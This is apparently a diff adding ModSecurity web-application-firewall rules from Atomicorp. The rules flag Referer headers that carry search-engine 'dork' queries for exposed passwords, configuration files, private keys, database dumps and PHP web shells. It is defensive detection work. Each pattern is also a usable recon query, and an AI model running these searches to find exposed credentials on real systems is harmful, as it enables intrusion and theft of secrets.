+SecRule REQUEST_HEADERS:Referer   "inurl:server\.cfg  rcon password" "t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371065,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Search Engine Recon Attempt for sensitive information'"
+SecRule REQUEST_HEADERS:Referer   "inurl:grc\.dat in(?:text|body):password" "t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371080,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Search Engine Recon Attempt for sensitive information'"
+SecRule REQUEST_HEADERS:Referer   "inurl:lilo\.conf filetype:conf password" "t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371114,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Search Engine Recon Attempt for sensitive information'"
+SecRule REQUEST_HEADERS:Referer   "inurl:ospfd\.conf in(?:text|body):password" "t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371119,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Search Engine Recon Attempt for sensitive information'"
+SecRule REQUEST_HEADERS:Referer   "inurl:zebra\.conf in(?:text|body):password" "t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371120,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Search Engine Recon Attempt for sensitive information'"
+SecRule REQUEST_HEADERS:Referer   "inurl:wvdial\.conf in(?:text|body):password" "t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371133,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Search Engine Recon Attempt for sensitive information'"
+SecRule REQUEST_HEADERS:Referer   "filetype:log inurl:password\.log" "t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371137,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Search Engine Recon Attempt for sensitive information'"
+SecRule REQUEST_HEADERS:Referer   "filetype:properties inurl:db in(?:text|body):password" "t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371143,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Search Engine Recon Attempt for sensitive information'"
+SecRule REQUEST_HEADERS:Referer   "inurl:changepassword\.asp" "t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371440,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Search Engine Recon Attempt for sensitive information'"
+SecRule REQUEST_HEADERS:Referer   "inurl:changepassword\.cgi -cvs" "t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371590,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Search Engine Recon Attempt for sensitive information'"
+SecRule REQUEST_HEADERS:Referer   "please enter a valid password! inurl:polladmin" "t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:373698,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Search Engine Recon Attempt for sensitive information'"
+SecRule REQUEST_HEADERS:Referer   "web-based management please input password to login" "t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:373702,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Search Engine Recon Attempt for sensitive information'"
+SecRule REQUEST_HEADERS:Referer   "in(?:text|body):master account  domain name password inurl:/cgi-bin/qmailadmin " "t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:373740,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Search Engine Recon Attempt for sensitive information'"
+SecRule REQUEST_HEADERS:Referer   "you can now password \| this is a special page only seen by you\. your profile visitors  inurl:imchaos" "t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:373991,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Search Engine Recon Attempt for sensitive information'"
+SecRule REQUEST_HEADERS:Referer   "inurl:wp-login\.php register username password" "t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372283,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Search Engine Recon Attempt for sensitive information'"
+SecRule REQUEST_HEADERS:Referer   "please re-enter your password it must match exactly" "t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371018,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Search Engine Recon Attempt for sensitive information'"
+SecRule REQUEST_HEADERS:Referer   "\+htpasswd \+ws_ftp\.log filetype" "t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371034,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Search Engine Recon Attempt for sensitive information'"
+SecRule REQUEST_HEADERS:Referer   "parent directory \+proftpdpasswd" "t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371048,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Search Engine Recon Attempt for sensitive information'"
+SecRule REQUEST_HEADERS:Referer   "autocreate=true password=\*" "t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371108,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Search Engine Recon Attempt for sensitive information'"
+SecRule REQUEST_HEADERS:Referer   "your password is \* remember this for later use" "t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371115,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Search Engine Recon Attempt for sensitive information'"
+SecRule REQUEST_HEADERS:Referer   "access denied for user using password" "t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371212,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Search Engine Recon Attempt for sensitive information'"
+SecRule REQUEST_HEADERS:Referer   "dumping data for table ?(?:user|passw)" "t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371391,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Search Engine Recon Attempt for sensitive information'"
+SecRule REQUEST_HEADERS:Referer   "site info for enter admin password" "t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371715,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Search Engine Recon Attempt for sensitive information'"
+SecRule REQUEST_HEADERS:Referer   "inurl:index.of.(?:password|protected)" "t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371646,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Search Engine Recon Attempt for sensitive information'"
+SecRule REQUEST_HEADERS:Referer   "inurl:passlist\.txt" "t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:373154,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Search Engine Recon Attempt for sensitive information'"
+
+
+SecMarker END_RECON_CHECKS_PASSWORD
+
+
+SecRule REQUEST_HEADERS:Referer "ext:"         "id:333893,phase:2,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,pass,nolog,noauditlog,skip:1"
+SecAction "phase:2,id:329543,t:none,pass,nolog,noauditlog,skipAfter:END_RECON_CHECKS_EXT"
+
+SecRule REQUEST_HEADERS:Referer   "ext:inc pwd= uid=" "t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371058,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Search Engine Recon Attempt for sensitive information'"
+SecRule REQUEST_HEADERS:Referer   "ext:ini version=4\.0\.0\.4 password" "t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371076,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Search Engine Recon Attempt for sensitive information'"
+SecRule REQUEST_HEADERS:Referer   "ext:ini eudora\.ini" "t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371077,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Search Engine Recon Attempt for sensitive information'"
+SecRule REQUEST_HEADERS:Referer   "liveice configuration file ext:cfg" "t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371090,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Search Engine Recon Attempt for sensitive information'"
+SecRule REQUEST_HEADERS:Referer   "intitle:urchin \(5\|3\|admin\) ext:cgi" "t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:373261,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Search Engine Recon Attempt for sensitive information'"
+SecRule REQUEST_HEADERS:Referer   "contacts ext:wml " "t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371263,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Search Engine Recon Attempt for sensitive information'"
+SecRule REQUEST_HEADERS:Referer   "ext:dca dca" "t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371272,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Search Engine Recon Attempt for sensitive information'"
+SecRule REQUEST_HEADERS:Referer   "ext:ccm ccm -catacomb" "t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371273,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Search Engine Recon Attempt for sensitive information'"
+SecRule REQUEST_HEADERS:Referer   "ext:cdx cdx" "t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371274,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Search Engine Recon Attempt for sensitive information'"
+SecRule REQUEST_HEADERS:Referer   "ext:dbf dbf" "t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371275,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Search Engine Recon Attempt for sensitive information'"
+SecRule REQUEST_HEADERS:Referer   "ext:jbf jbf" "t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371276,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Search Engine Recon Attempt for sensitive information'"
+SecRule REQUEST_HEADERS:Referer   "ext:ics ics" "t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371278,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Search Engine Recon Attempt for sensitive information'"
+SecRule REQUEST_HEADERS:Referer   "ext:reg username=\* putty" "t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371292,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Search Engine Recon Attempt for sensitive information'"
+SecRule REQUEST_HEADERS:Referer   "ext:dat bpk\.dat" "t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371305,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Search Engine Recon Attempt for sensitive information'"
+SecRule REQUEST_HEADERS:Referer   "ext:vmx vmx" "t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371310,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Search Engine Recon Attempt for sensitive information'"
+SecRule REQUEST_HEADERS:Referer   "ext:vmdk vmdk" "t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371311,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Search Engine Recon Attempt for sensitive information'"
+SecRule REQUEST_HEADERS:Referer   "ext:pqi pqi -database" "t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371312,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Search Engine Recon Attempt for sensitive information'"
+SecRule REQUEST_HEADERS:Referer   "ext:gho gho" "t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371313,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Search Engine Recon Attempt for sensitive information'"
+SecRule REQUEST_HEADERS:Referer   "ext:txt final encryption key " "t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371316,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Search Engine Recon Attempt for sensitive information'"
+SecRule REQUEST_HEADERS:Referer   "microsoft \(r\) windows \* \(tm\) version \* drwtsn32 copyright \(c\) ext:log" "t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371318,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Search Engine Recon Attempt for sensitive information'"
+SecRule REQUEST_HEADERS:Referer   "ext:conf nocatauth -cvs" "t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371327,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Search Engine Recon Attempt for sensitive information'"
+SecRule REQUEST_HEADERS:Referer   "ext:ldif ldif" "t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371346,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Search Engine Recon Attempt for sensitive information'"
+SecRule REQUEST_HEADERS:Referer   "ext:log software: microsoft internet information services \*\.\*" "t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371349,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Search Engine Recon Attempt for sensitive information'"
+SecRule REQUEST_HEADERS:Referer   "intitle:member login note: your browser must have cookies enabled in order to log into the site\. ext:php or ext:cgi" "t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:373756,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Search Engine Recon Attempt for sensitive information'"
+SecRule REQUEST_HEADERS:Referer   "ext:cgi  intitle:control panel enter your owner password to continue!" "t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:373788,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Search Engine Recon Attempt for sensitive information'"
+SecRule REQUEST_HEADERS:Referer   "ext:cfg radius\.cfg" "t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371938,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Search Engine Recon Attempt for sensitive information'"
+SecRule REQUEST_HEADERS:Referer   "intitle:middle frame of videoconference management system ext:htm" "t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:373107,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Search Engine Recon Attempt for sensitive information'"
+SecRule REQUEST_HEADERS:Referer   "ext:dhtml intitle:document centre\|\(home\) or intitle:xerox" "t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:373131,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Search Engine Recon Attempt for sensitive information'"
+
+SecMarker END_RECON_CHECKS_EXT
+
+SecRule REQUEST_HEADERS:Referer "filetype:"         "id:333894,phase:2,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,pass,nolog,noauditlog,skip:1"
+SecAction "phase:2,id:329544,t:none,pass,nolog,noauditlog,skipAfter:END_RECON_CHECKS_FILETYPE"
+
+SecRule REQUEST_HEADERS:Referer  "intitle.*php shell.*enable stderr.*filetype:\.?php" "t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:350016,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon attempt'"
+SecRule REQUEST_HEADERS:Referer   "phpkonsole phpshell filetype:php" "t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:373226,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Search Engine Recon Attempt for sensitive information'"
+SecRule REQUEST_HEADERS:Referer   "filetype:php haxplorer server files browser" "t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371027,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Search Engine Recon Attempt for sensitive information'"
+SecRule REQUEST_HEADERS:Referer   "filetype:bak createobject sa" "t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371046,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Search Engine Recon Attempt for sensitive information'"
+SecRule REQUEST_HEADERS:Referer   "admin account info filetype:log" "t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371053,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Search Engine Recon Attempt for sensitive information'"
+SecRule REQUEST_HEADERS:Referer   "filetype:inf sysprep " "t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371068,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Search Engine Recon Attempt for sensitive information'"
+SecRule REQUEST_HEADERS:Referer   "filetype:inc mysql_connect or mysql_pconnect" "t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371075,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Search Engine Recon Attempt for sensitive information'"
+SecRule REQUEST_HEADERS:Referer   "filetype:log see `ipsec --copyright" "t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371081,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Search Engine Recon Attempt for sensitive information'"
+SecRule REQUEST_HEADERS:Referer   "filetype:mdb wwforum" "t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371096,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Search Engine Recon Attempt for sensitive information'"
+SecRule REQUEST_HEADERS:Referer   "filetype:ini wcx_ftp" "t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371099,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Search Engine Recon Attempt for sensitive information'"
+SecRule REQUEST_HEADERS:Referer   "filetype:conf oekakibbs " "t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371101,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Search Engine Recon Attempt for sensitive information'"
+SecRule REQUEST_HEADERS:Referer   "filetype:ini servudaemon" "t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371106,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Search Engine Recon Attempt for sensitive information'"
+SecRule REQUEST_HEADERS:Referer   "filetype:pwl pwl" "t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371110,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Search Engine Recon Attempt for sensitive information'"
+SecRule REQUEST_HEADERS:Referer   "filetype:pwd service" "t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371121,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Search Engine Recon Attempt for sensitive information'"
+SecRule REQUEST_HEADERS:Referer   "filetype:sql \+identified by -cvs" "t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371123,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Search Engine Recon Attempt for sensitive information'"
+SecRule REQUEST_HEADERS:Referer   "filetype:ldb admin" "t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371124,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Search Engine Recon Attempt for sensitive information'"
+SecRule REQUEST_HEADERS:Referer   "filetype:cfg mrtg target\[\*\] -sample -cvs -example" "t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371125,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Search Engine Recon Attempt for sensitive information'"
+SecRule REQUEST_HEADERS:Referer   "filetype:dat wand\.dat" "t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371126,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Search Engine Recon Attempt for sensitive information'"
+SecRule REQUEST_HEADERS:Referer   "filetype:ini \+ws_ftp \+pwd" "t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371129,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Search Engine Recon Attempt for sensitive information'"
+SecRule REQUEST_HEADERS:Referer   "signin filetype:url" "t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371127,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Search Engine Recon Attempt for sensitive information'"
+SecRule REQUEST_HEADERS:Referer   "filetype:inc dbconn" "t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371132,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Search Engine Recon Attempt for sensitive information'"
+SecRule REQUEST_HEADERS:Referer   "filetype:conf slapd\.conf" "t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371135,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Search Engine Recon Attempt for sensitive information'"
+SecRule REQUEST_HEADERS:Referer   "filetype:reg reg hkey_current_user sshhostkeys " "t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371140,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Search Engine Recon Attempt for sensitive information'"
+SecRule REQUEST_HEADERS:Referer   "eggdrop filetype:user user" "t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371147,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Search Engine Recon Attempt for sensitive information'"
+SecRule REQUEST_HEADERS:Referer   "filetype:reg reg hkey_current_user sshhostkeys" "t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371248,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Search Engine Recon Attempt for sensitive information'"
+SecRule REQUEST_HEADERS:Referer   "filetype:ps ps" "t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371269,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Search Engine Recon Attempt for sensitive information'"
+SecRule REQUEST_HEADERS:Referer   "filetype:qbw qbw" "t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371270,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Search Engine Recon Attempt for sensitive information'"
+SecRule REQUEST_HEADERS:Referer   "mysql dump filetype:sql 21232f297a57a5a743894a0e4a801fc3" "t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371281,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Search Engine Recon Attempt for sensitive information'"
+SecRule REQUEST_HEADERS:Referer   "filetype:ora tnsnames" "t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371282,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Search Engine Recon Attempt for sensitive information'"
+SecRule REQUEST_HEADERS:Referer   "filetype:ctt msn" "t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371296,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Search Engine Recon Attempt for sensitive information'"
+SecRule REQUEST_HEADERS:Referer   "filetype:ctt contact" "t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371297,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Search Engine Recon Attempt for sensitive information'"
+SecRule REQUEST_HEADERS:Referer   "filetype:blt buddylist" "t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371299,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Search Engine Recon Attempt for sensitive information'"
+SecRule REQUEST_HEADERS:Referer   "filetype:myd myd -cvs" "t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371321,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Search Engine Recon Attempt for sensitive information'"
+SecRule REQUEST_HEADERS:Referer   "filetype:config web\.config -cvs" "t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371322,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Search Engine Recon Attempt for sensitive information'"
+SecRule REQUEST_HEADERS:Referer   "filetype:ns1 ns1" "t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371323,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Search Engine Recon Attempt for sensitive information'"
+SecRule REQUEST_HEADERS:Referer   "filetype:pst pst -from -to -date" "t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371325,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Search Engine Recon Attempt for sensitive information'"
+SecRule REQUEST_HEADERS:Referer   "filetype:vcs vcs" "t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371348,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Search Engine Recon Attempt for sensitive information'"
+SecRule REQUEST_HEADERS:Referer   "filetype:asp dbq= & server\.mappath\(\*\.mdb\)" "t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371351,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Search Engine Recon Attempt for sensitive information'"
+SecRule REQUEST_HEADERS:Referer   "filetype:pdb pdb backup \(pilot \| pluckerdb\) " "t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371352,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Search Engine Recon Attempt for sensitive information'"
+SecRule REQUEST_HEADERS:Referer   "filetype:reg terminal server client" "t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371355,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Search Engine Recon Attempt for sensitive information'"
+SecRule REQUEST_HEADERS:Referer   "filetype:rdp rdp" "t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371356,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Search Engine Recon Attempt for sensitive information'"
+SecRule REQUEST_HEADERS:Referer   "filetype:bkf bkf" "t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371358,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Search Engine Recon Attempt for sensitive information'"
+SecRule REQUEST_HEADERS:Referer   "filetype:qbb qbb" "t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371359,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Search Engine Recon Attempt for sensitive information'"
+SecRule REQUEST_HEADERS:Referer   "filetype:qdf qdf" "t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371361,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Search Engine Recon Attempt for sensitive information'"
+SecRule REQUEST_HEADERS:Referer   "filetype:cfg auto_inst\.cfg" "t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371368,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Search Engine Recon Attempt for sensitive information'"
+SecRule REQUEST_HEADERS:Referer   "filetype:fp7 fp7" "t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371369,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Search Engine Recon Attempt for sensitive information'"
+SecRule REQUEST_HEADERS:Referer   "filetype:fp3 fp3" "t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371370,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Search Engine Recon Attempt for sensitive information'"
+SecRule REQUEST_HEADERS:Referer   "filetype:fp5 fp5 -site:gov -site:mil -cvs log" "t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371371,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Search Engine Recon Attempt for sensitive information'"
+SecRule REQUEST_HEADERS:Referer   "filetype:ora ora" "t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371374,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Search Engine Recon Attempt for sensitive information'"
+SecRule REQUEST_HEADERS:Referer   "data filetype:mdb -site:gov -site:mil" "t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371381,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Search Engine Recon Attempt for sensitive information'"
+SecRule REQUEST_HEADERS:Referer   "begin \(certificate\|dsa\|rsa\) filetype:csr" "t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371387,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Search Engine Recon Attempt for sensitive information'"
+SecRule REQUEST_HEADERS:Referer   "begin \(certificate\|dsa\|rsa\) filetype:key" "t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371388,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Search Engine Recon Attempt for sensitive information'"
+SecRule REQUEST_HEADERS:Referer   "e-mail address filetype:csv csv" "t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371389,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Search Engine Recon Attempt for sensitive information'"
